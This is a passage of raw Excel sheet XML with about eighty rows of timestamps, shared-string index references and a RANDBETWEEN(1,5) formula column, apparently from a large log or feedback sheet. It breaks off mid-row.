    <row r="23166" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23166" s="1">
        <v>43025.652824074074</v>
      </c>
      <c r="C23166" t="s">
        <v>3027</v>
      </c>
      <c r="D23166" t="s">
        <v>178</v>
      </c>
      <c r="E23166" s="2" t="s">
        <v>20949</v>
      </c>
      <c r="F23166">
        <f t="shared" ca="1" si="361"/>
        <v>3</v>
      </c>
    </row>
    <row r="23167" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23167" s="1">
        <v>43025.641226851854</v>
      </c>
      <c r="C23167" t="s">
        <v>10</v>
      </c>
      <c r="D23167" t="s">
        <v>251</v>
      </c>
      <c r="E23167" t="s">
        <v>20950</v>
      </c>
      <c r="F23167">
        <f t="shared" ca="1" si="361"/>
        <v>4</v>
      </c>
    </row>
    <row r="23168" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23168" s="1">
        <v>43025.63517361111</v>
      </c>
      <c r="C23168" t="s">
        <v>6</v>
      </c>
      <c r="D23168" t="s">
        <v>821</v>
      </c>
      <c r="E23168" t="s">
        <v>20951</v>
      </c>
      <c r="F23168">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23169" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23169" s="1">
        <v>43025.616655092592</v>
      </c>
      <c r="C23169" t="s">
        <v>4852</v>
      </c>
      <c r="E23169" t="s">
        <v>20952</v>
      </c>
      <c r="F23169">
        <f t="shared" ca="1" si="361"/>
        <v>1</v>
      </c>
    </row>
    <row r="23170" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23170" s="1">
        <v>43025.599421296298</v>
      </c>
      <c r="C23170" t="s">
        <v>10</v>
      </c>
      <c r="D23170" t="s">
        <v>23</v>
      </c>
      <c r="E23170" s="2" t="s">
        <v>20953</v>
      </c>
      <c r="F23170">
        <f t="shared" ref="F23170:F23233" ca="1" si="362">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="23171" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23171" s="1">
        <v>43025.580787037034</v>
      </c>
      <c r="C23171" t="s">
        <v>477</v>
      </c>
      <c r="E23171" s="2" t="s">
        <v>20954</v>
      </c>
      <c r="F23171">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23172" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23172" s="1">
        <v>43025.563703703701</v>
      </c>
      <c r="C23172" t="s">
        <v>10</v>
      </c>
      <c r="D23172" t="s">
        <v>151</v>
      </c>
      <c r="E23172" s="2" t="s">
        <v>20955</v>
      </c>
      <c r="F23172">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23173" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23173" s="1">
        <v>43025.560034722221</v>
      </c>
      <c r="C23173" t="s">
        <v>10</v>
      </c>
      <c r="D23173" t="s">
        <v>36</v>
      </c>
      <c r="E23173" t="s">
        <v>20956</v>
      </c>
      <c r="F23173">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23174" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23174" s="1">
        <v>43025.496724537035</v>
      </c>
      <c r="C23174" t="s">
        <v>10</v>
      </c>
      <c r="D23174" t="s">
        <v>251</v>
      </c>
      <c r="E23174" t="s">
        <v>20957</v>
      </c>
      <c r="F23174">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23175" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23175" s="1">
        <v>43025.491111111114</v>
      </c>
      <c r="C23175" t="s">
        <v>1050</v>
      </c>
      <c r="E23175" s="2" t="s">
        <v>20958</v>
      </c>
      <c r="F23175">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23176" s="1">
        <v>43025.486643518518</v>
      </c>
      <c r="C23176" t="s">
        <v>48</v>
      </c>
      <c r="E23176" t="s">
        <v>20959</v>
      </c>
      <c r="F23176">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23177" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23177" s="1">
        <v>43025.475972222222</v>
      </c>
      <c r="C23177" t="s">
        <v>10</v>
      </c>
      <c r="D23177" t="s">
        <v>17</v>
      </c>
      <c r="E23177" t="s">
        <v>20960</v>
      </c>
      <c r="F23177">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23178" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23178" s="1">
        <v>43025.475636574076</v>
      </c>
      <c r="C23178" t="s">
        <v>10</v>
      </c>
      <c r="D23178" t="s">
        <v>251</v>
      </c>
      <c r="E23178" t="s">
        <v>20961</v>
      </c>
      <c r="F23178">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23179" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23179" s="1">
        <v>43025.468819444446</v>
      </c>
      <c r="C23179" t="s">
        <v>10</v>
      </c>
      <c r="D23179" t="s">
        <v>89</v>
      </c>
      <c r="E23179" t="s">
        <v>20962</v>
      </c>
      <c r="F23179">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23180" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23180" s="1">
        <v>43025.462731481479</v>
      </c>
      <c r="C23180" t="s">
        <v>63</v>
      </c>
      <c r="E23180" t="s">
        <v>20963</v>
      </c>
      <c r="F23180">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23181" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23181" s="1">
        <v>43025.455613425926</v>
      </c>
      <c r="C23181" t="s">
        <v>65</v>
      </c>
      <c r="E23181" t="s">
        <v>20964</v>
      </c>
      <c r="F23181">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23182" s="1">
        <v>43025.45484953704</v>
      </c>
      <c r="C23182" t="s">
        <v>10</v>
      </c>
      <c r="D23182" t="s">
        <v>251</v>
      </c>
      <c r="E23182" t="s">
        <v>20965</v>
      </c>
      <c r="F23182">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23183" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23183" s="1">
        <v>43025.439340277779</v>
      </c>
      <c r="C23183" t="s">
        <v>48</v>
      </c>
      <c r="E23183" s="2" t="s">
        <v>20966</v>
      </c>
      <c r="F23183">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23184" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A23184" s="1">
        <v>43025.430798611109</v>
      </c>
      <c r="C23184" t="s">
        <v>48</v>
      </c>
      <c r="E23184" s="2" t="s">
        <v>20967</v>
      </c>
      <c r="F23184">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23185" s="1">
        <v>43025.428807870368</v>
      </c>
      <c r="C23185" t="s">
        <v>260</v>
      </c>
      <c r="E23185" t="s">
        <v>20968</v>
      </c>
      <c r="F23185">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23186" s="1">
        <v>43025.398969907408</v>
      </c>
      <c r="C23186" t="s">
        <v>10</v>
      </c>
      <c r="D23186" t="s">
        <v>80</v>
      </c>
      <c r="E23186" t="s">
        <v>20969</v>
      </c>
      <c r="F23186">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23187" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A23187" s="1">
        <v>43025.373101851852</v>
      </c>
      <c r="C23187" t="s">
        <v>430</v>
      </c>
      <c r="E23187" s="2" t="s">
        <v>20970</v>
      </c>
      <c r="F23187">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23188" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A23188" s="1">
        <v>43025.369641203702</v>
      </c>
      <c r="C23188" t="s">
        <v>10</v>
      </c>
      <c r="D23188" t="s">
        <v>80</v>
      </c>
      <c r="E23188" s="2" t="s">
        <v>20971</v>
      </c>
      <c r="F23188">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23189" s="1">
        <v>43025.362210648149</v>
      </c>
      <c r="C23189" t="s">
        <v>10</v>
      </c>
      <c r="D23189" t="s">
        <v>271</v>
      </c>
      <c r="E23189" t="s">
        <v>20972</v>
      </c>
      <c r="F23189">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23190" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23190" s="1">
        <v>43025.350659722222</v>
      </c>
      <c r="C23190" t="s">
        <v>10</v>
      </c>
      <c r="D23190" t="s">
        <v>52</v>
      </c>
      <c r="E23190" t="s">
        <v>20973</v>
      </c>
      <c r="F23190">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23191" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23191" s="1">
        <v>43025.345451388886</v>
      </c>
      <c r="C23191" t="s">
        <v>65</v>
      </c>
      <c r="E23191" s="2" t="s">
        <v>20974</v>
      </c>
      <c r="F23191">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23192" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23192" s="1">
        <v>43025.312094907407</v>
      </c>
      <c r="C23192" t="s">
        <v>260</v>
      </c>
      <c r="D23192" t="s">
        <v>56</v>
      </c>
      <c r="E23192" s="2" t="s">
        <v>20975</v>
      </c>
      <c r="F23192">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23193" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23193" s="1">
        <v>43025.282280092593</v>
      </c>
      <c r="C23193" t="s">
        <v>731</v>
      </c>
      <c r="E23193" t="s">
        <v>20976</v>
      </c>
      <c r="F23193">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23194" s="1">
        <v>43025.278171296297</v>
      </c>
      <c r="C23194" t="s">
        <v>48</v>
      </c>
      <c r="E23194" t="s">
        <v>20977</v>
      </c>
      <c r="F23194">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23195" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23195" s="1">
        <v>43025.267511574071</v>
      </c>
      <c r="C23195" t="s">
        <v>48</v>
      </c>
      <c r="E23195" t="s">
        <v>20978</v>
      </c>
      <c r="F23195">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23196" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A23196" s="1">
        <v>43025.264305555553</v>
      </c>
      <c r="C23196" t="s">
        <v>65</v>
      </c>
      <c r="E23196" s="2" t="s">
        <v>20979</v>
      </c>
      <c r="F23196">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23197" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A23197" s="1">
        <v>43025.239189814813</v>
      </c>
      <c r="C23197" t="s">
        <v>430</v>
      </c>
      <c r="E23197" s="2" t="s">
        <v>20980</v>
      </c>
      <c r="F23197">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23198" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A23198" s="1">
        <v>43025.221041666664</v>
      </c>
      <c r="C23198" t="s">
        <v>41</v>
      </c>
      <c r="E23198" s="2" t="s">
        <v>20981</v>
      </c>
      <c r="F23198">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23199" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23199" s="1">
        <v>43025.201331018521</v>
      </c>
      <c r="C23199" t="s">
        <v>41</v>
      </c>
      <c r="E23199" s="2" t="s">
        <v>20982</v>
      </c>
      <c r="F23199">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23200" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23200" s="1">
        <v>43025.199421296296</v>
      </c>
      <c r="C23200" t="s">
        <v>836</v>
      </c>
      <c r="E23200" t="s">
        <v>20983</v>
      </c>
      <c r="F23200">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23201" s="1">
        <v>43025.167916666665</v>
      </c>
      <c r="C23201" t="s">
        <v>2545</v>
      </c>
      <c r="F23201">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23202" s="1">
        <v>43025.159247685187</v>
      </c>
      <c r="C23202" t="s">
        <v>41</v>
      </c>
      <c r="E23202" t="s">
        <v>20984</v>
      </c>
      <c r="F23202">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23203" s="1">
        <v>43024.966458333336</v>
      </c>
      <c r="C23203" t="s">
        <v>314</v>
      </c>
      <c r="E23203" t="s">
        <v>20985</v>
      </c>
      <c r="F23203">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23204" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23204" s="1">
        <v>43024.807303240741</v>
      </c>
      <c r="C23204" t="s">
        <v>10</v>
      </c>
      <c r="D23204" t="s">
        <v>6</v>
      </c>
      <c r="E23204" s="2" t="s">
        <v>20986</v>
      </c>
      <c r="F23204">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23205" s="1">
        <v>43024.7499537037</v>
      </c>
      <c r="C23205" t="s">
        <v>48</v>
      </c>
      <c r="E23205" t="s">
        <v>20987</v>
      </c>
      <c r="F23205">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23206" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23206" s="1">
        <v>43024.725671296299</v>
      </c>
      <c r="C23206" t="s">
        <v>10</v>
      </c>
      <c r="D23206" t="s">
        <v>232</v>
      </c>
      <c r="E23206" t="s">
        <v>20988</v>
      </c>
      <c r="F23206">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23207" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23207" s="1">
        <v>43024.683993055558</v>
      </c>
      <c r="C23207" t="s">
        <v>124</v>
      </c>
      <c r="E23207" s="2" t="s">
        <v>20989</v>
      </c>
      <c r="F23207">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23208" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23208" s="1">
        <v>43024.668703703705</v>
      </c>
      <c r="C23208" t="s">
        <v>10</v>
      </c>
      <c r="D23208" t="s">
        <v>36</v>
      </c>
      <c r="E23208" t="s">
        <v>20990</v>
      </c>
      <c r="F23208">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23209" s="1">
        <v>43024.636261574073</v>
      </c>
      <c r="C23209" t="s">
        <v>10</v>
      </c>
      <c r="D23209" t="s">
        <v>20</v>
      </c>
      <c r="E23209" t="s">
        <v>20991</v>
      </c>
      <c r="F23209">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23210" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23210" s="1">
        <v>43024.60396990741</v>
      </c>
      <c r="C23210" t="s">
        <v>10</v>
      </c>
      <c r="D23210" t="s">
        <v>192</v>
      </c>
      <c r="E23210" t="s">
        <v>20992</v>
      </c>
      <c r="F23210">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23211" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23211" s="1">
        <v>43024.601539351854</v>
      </c>
      <c r="C23211" t="s">
        <v>260</v>
      </c>
      <c r="E23211" s="2" t="s">
        <v>20993</v>
      </c>
      <c r="F23211">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23212" s="1">
        <v>43024.598935185182</v>
      </c>
      <c r="C23212" t="s">
        <v>10</v>
      </c>
      <c r="D23212" t="s">
        <v>232</v>
      </c>
      <c r="E23212" t="s">
        <v>20994</v>
      </c>
      <c r="F23212">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23213" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23213" s="1">
        <v>43024.596261574072</v>
      </c>
      <c r="C23213" t="s">
        <v>10</v>
      </c>
      <c r="D23213" t="s">
        <v>20</v>
      </c>
      <c r="E23213" t="s">
        <v>20995</v>
      </c>
      <c r="F23213">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23214" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23214" s="1">
        <v>43024.58189814815</v>
      </c>
      <c r="C23214" t="s">
        <v>10</v>
      </c>
      <c r="D23214" t="s">
        <v>17</v>
      </c>
      <c r="E23214" t="s">
        <v>20996</v>
      </c>
      <c r="F23214">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23215" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23215" s="1">
        <v>43024.551817129628</v>
      </c>
      <c r="C23215" t="s">
        <v>6</v>
      </c>
      <c r="D23215" t="s">
        <v>750</v>
      </c>
      <c r="E23215" s="2" t="s">
        <v>20997</v>
      </c>
      <c r="F23215">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23216" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23216" s="1">
        <v>43024.542037037034</v>
      </c>
      <c r="C23216" t="s">
        <v>10</v>
      </c>
      <c r="D23216" t="s">
        <v>271</v>
      </c>
      <c r="E23216" t="s">
        <v>20998</v>
      </c>
      <c r="F23216">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23217" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23217" s="1">
        <v>43024.530115740738</v>
      </c>
      <c r="C23217" t="s">
        <v>10</v>
      </c>
      <c r="D23217" t="s">
        <v>192</v>
      </c>
      <c r="E23217" t="s">
        <v>20999</v>
      </c>
      <c r="F23217">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23218" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23218" s="1">
        <v>43024.501608796294</v>
      </c>
      <c r="C23218" t="s">
        <v>10</v>
      </c>
      <c r="D23218" t="s">
        <v>36</v>
      </c>
      <c r="E23218" s="2" t="s">
        <v>21000</v>
      </c>
      <c r="F23218">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23219" s="1">
        <v>43024.498738425929</v>
      </c>
      <c r="C23219" t="s">
        <v>50</v>
      </c>
      <c r="E23219" t="s">
        <v>21001</v>
      </c>
      <c r="F23219">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23220" s="1">
        <v>43024.498483796298</v>
      </c>
      <c r="C23220" t="s">
        <v>10</v>
      </c>
      <c r="D23220" t="s">
        <v>271</v>
      </c>
      <c r="E23220" t="s">
        <v>21002</v>
      </c>
      <c r="F23220">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23221" s="1">
        <v>43024.494039351855</v>
      </c>
      <c r="C23221" t="s">
        <v>6</v>
      </c>
      <c r="D23221" t="s">
        <v>82</v>
      </c>
      <c r="E23221" t="s">
        <v>21003</v>
      </c>
      <c r="F23221">
        <f t="shared" ca="1" si="362"/>
        <v>4</v>
      </c>
    </row>
    <row r="23222" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23222" s="1">
        <v>43024.468078703707</v>
      </c>
      <c r="C23222" t="s">
        <v>48</v>
      </c>
      <c r="E23222" s="2" t="s">
        <v>21004</v>
      </c>
      <c r="F23222">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23223" s="1">
        <v>43024.461585648147</v>
      </c>
      <c r="C23223" t="s">
        <v>301</v>
      </c>
      <c r="E23223" t="s">
        <v>21005</v>
      </c>
      <c r="F23223">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23224" s="1">
        <v>43024.454351851855</v>
      </c>
      <c r="C23224" t="s">
        <v>260</v>
      </c>
      <c r="E23224" t="s">
        <v>21006</v>
      </c>
      <c r="F23224">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23225" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23225" s="1">
        <v>43024.437939814816</v>
      </c>
      <c r="C23225" t="s">
        <v>48</v>
      </c>
      <c r="E23225" s="2" t="s">
        <v>21007</v>
      </c>
      <c r="F23225">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23226" s="1">
        <v>43024.437939814816</v>
      </c>
      <c r="C23226" t="s">
        <v>10</v>
      </c>
      <c r="D23226" t="s">
        <v>36</v>
      </c>
      <c r="E23226" t="s">
        <v>21008</v>
      </c>
      <c r="F23226">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23227" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23227" s="1">
        <v>43024.433287037034</v>
      </c>
      <c r="C23227" t="s">
        <v>14</v>
      </c>
      <c r="E23227" s="2" t="s">
        <v>21009</v>
      </c>
      <c r="F23227">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23228" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23228" s="1">
        <v>43024.429201388892</v>
      </c>
      <c r="C23228" t="s">
        <v>10</v>
      </c>
      <c r="D23228" t="s">
        <v>271</v>
      </c>
      <c r="F23228">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23229" s="1">
        <v>43024.424722222226</v>
      </c>
      <c r="C23229" t="s">
        <v>71</v>
      </c>
      <c r="E23229" t="s">
        <v>21010</v>
      </c>
      <c r="F23229">
        <f t="shared" ca="1" si="362"/>
        <v>5</v>
      </c>
    </row>
    <row r="23230" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A23230" s="1">
        <v>43024.42083333333</v>
      </c>
      <c r="C23230" t="s">
        <v>48</v>
      </c>
      <c r="E23230" s="2" t="s">
        <v>21011</v>
      </c>
      <c r="F23230">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23231" s="1">
        <v>43024.418252314812</v>
      </c>
      <c r="C23231" t="s">
        <v>260</v>
      </c>
      <c r="E23231" t="s">
        <v>21012</v>
      </c>
      <c r="F23231">
        <f t="shared" ca="1" si="362"/>
        <v>1</v>
      </c>
    </row>
    <row r="23232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23232" s="1">
        <v>43024.407037037039</v>
      </c>
      <c r="C23232" t="s">
        <v>10</v>
      </c>
      <c r="D23232" t="s">
        <v>52</v>
      </c>
      <c r="E23232" t="s">
        <v>21013</v>
      </c>
      <c r="F23232">
        <f t="shared" ca="1" si="362"/>
        <v>2</v>
      </c>
    </row>
    <row r="23233" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23233" s="1">
        <v>43024.399629629632</v>
      </c>
      <c r="C23233" t="s">
        <v>836</v>
      </c>
      <c r="E23233" s="2" t="s">
        <v>21014</v>
      </c>
      <c r="F23233">
        <f t="shared" ca="1" si="362"/>
        <v>3</v>
      </c>
    </row>
    <row r="23234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23234" s="1">
        <v>43024.396539351852</v>
      </c>
      <c r="C23234" t="s">
        <v>7491</v>
      </c>
      <c r="D23234" t="s">
        <v>667</v>
      </c>
      <c r="E23234" t="s">
        <v>21015</v>
      </c>
      <c r="F23234">
        <f t="shared" ref="F23234:F23297" ca="1" si="363">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="23235" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23235" s="1">
        <v>43024.383356481485</v>
      </c>
      <c r="C23235" t="s">
        <v>103</v>
      </c>
      <c r="E23235" s="2" t="s">
        <v>21016</v>
      </c>
      <c r="F23235">
        <f t="shared" ca="1" si="363"/>
        <v>1</v>
      </c>
    </row>
    <row r="23236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23236" s="1">
        <v>43024.371296296296</v>
      </c>
      <c r="C23236" t="s">
        <v>48</v>
      </c>
      <c r="E23236" t="s">
        <v>21017</v>
      </c>
      <c r="F23236">
        <f t="shared" ca="1" si="363"/>
        <v>5</v>
      </c>
    </row>
    <row r="23237" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23237" s="1">
        <v>43024.362303240741</v>
      </c>
      <c r="C23237" t="s">
        <v>48</v>
      </c>
      <c r="E23237" s="2" t="s">
        <v>21018</v>
      </c>
      <c r="F23237">
        <f t="shared" ca="1" si="363"/>
        <v>3</v>
      </c>
    </row>
    <row r="23238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23238" s="1">
        <v>43024.361192129632</v>
      </c>
      <c r="C23238" t="s">
        <v>6</v>
      </c>
      <c r="D23238" t="s">
        <v>25</v>
      </c>
      <c r="E23238" t="s">
        <v>21019</v>
      </c>
      <c r="F23238">
        <f t="shared" ca="1" si="363"/>
        <v>4</v>
      </c>
    </row>
    <row r="23239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23239" s="1">
        <v>43024.333645833336</v>
      </c>
      <c r="C23239" t="s">
        <v>48</v>
      </c>
      <c r="E23239" t="s">
        <v>21020</v>
      </c>
      <c r="F23239">
        <f t="shared" ca="1" si="363"/>
        <v>2</v>
      </c>
    </row>
    <row r="23240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23240" s="1">
        <v>43024.328032407408</v>
      </c>
      <c r="C23240" t="s">
        <v>477</v>
      </c>
      <c r="E23240" t="s">
        <v>21021</v>
      </c>
      <c r="F23240">
        <f t="shared" ca="1" si="363"/>
        <v>2</v>
      </c>
    </row>
    <row r="23241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23241" s="1">
        <v>43024.320081018515</v>
      </c>
      <c r="C23241" t="s">
        <v>48</v>
      </c>
      <c r="E23241" t="s">
        <v>21022</v>
      </c>
      <c r="F23241">
        <f t="shared" ca="1" si="363"/>
        <v>3</v>
      </c>
    </row>
    <row r="23242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23242" s="1">
        <v>43024.30128472222</v>
      </c>
      <c r="C23242" t="s">
        <v>41</v>
      </c>
      <c r="F23242">
        <f t="shared" ca="1" si="363"/>
        <v>2</v>
      </c>
    </row>
    <row r="23243" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23243" s="1">
        <v>43024.292916666665</v>
      </c>
      <c r="C23243" t="s">
        <v>471</v>
      </c>
      <c r="E23243" s="2" t="s">
        <v>21023</v>
      </c>
      <c r="F23243">
        <f t="shared" ca="1" si="363"/>
        <v>2</v>
      </c>
    </row>
    <row r="23244" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23244" s="1">
        <v>43024.244814814818</v>
      </c>
      <c r="C23244" t="s">
        <v>48</v>
      </c>
      <c r="E23244" t="s">
        <v>21024</v>
      </c>
      <c r="F23244">
        <f t="shared" ca="1" si="363"/>
        <v>5</v>
      </c>
    </row>
    <row r="23245" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23245" s="1">
        <v>43024.235625000001</v>
      </c>
      <c r="C23245" t="s">
        <v>71</v>
      </c>
      <c r="D23245" t="s">
        <v>312</v>
      </c>
      <c r="E23245" s="2" t="s">
        <v>21025</v>
      </c>
      <c r="F23245">
        <f t="shared" ca="1" si="363"/>
        <v>5</v>
      </c>
    </row>
    <row r="23246" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23246" s="1">
        <v>43024.233923611115</v>
      </c>
